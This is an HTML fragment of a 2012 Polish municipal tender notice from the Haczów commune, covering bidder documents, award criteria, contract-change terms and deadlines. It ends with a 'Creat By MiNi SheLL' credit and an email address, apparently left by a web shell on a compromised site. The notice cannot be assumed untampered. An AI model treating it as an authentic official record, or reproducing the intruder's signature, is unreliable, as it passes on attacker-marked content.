<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych robót z przyczyn  niezależnych zarówno w stosunku do projektowanych w Dokumentacji projektowej ( podnoszących jakość technologiczną), danych adresowych  wykonawcy, terminu wykonania zamówienia w przypadku wystąpienia  niesprzyjających warunków atmosferycznych, wstrzymania robót lub przerw w pracach, powstałych z przyczyn leżących po stronie Zama-wiającego, wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub przerwania robót, z przyczyn niezależnych od Zamawiającego lub Wykonawcy, wstrzymania robót na mocy decyzji Zamawiającego lub innych organów, z przyczyn innych, niż związane z błędnym sposobem realizacji robót przez Wykonawcę, użyciem przez niego wadliwych materiałów, urządzeń lub elementów wyposażenia, czy też naruszeniem przez Wy?konawcę przepisów prawa, wystąpienia w trakcie wykonywania robót kolizji z sieciami lub innymi przeszkodami, które nie były możliwe do przewidzenia po przeanalizowaniu dostarczonego Wykonawcy przez Za?mawiającego projektu budowlanego, wykonawczego, zmiany stawki podatku VAT oraz uzgodnień, wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: 	działania wojenne, rozruchy, klęska żywiołowa,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów  nr 573, pokój  nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2012 godzina 09:00, miejsce: Urzad  Gminy Haczów, 36-213 Haczów  nr 573, pokój  nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze postępowanie prowadzone jest w ramach środków  przyznanych  przez Urząd  Marszałkowski Województwa  Podkarpackiego w ramach  działania 321 Podstawowe usługi  dla  gospodarki i  ludności wiejskiej objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com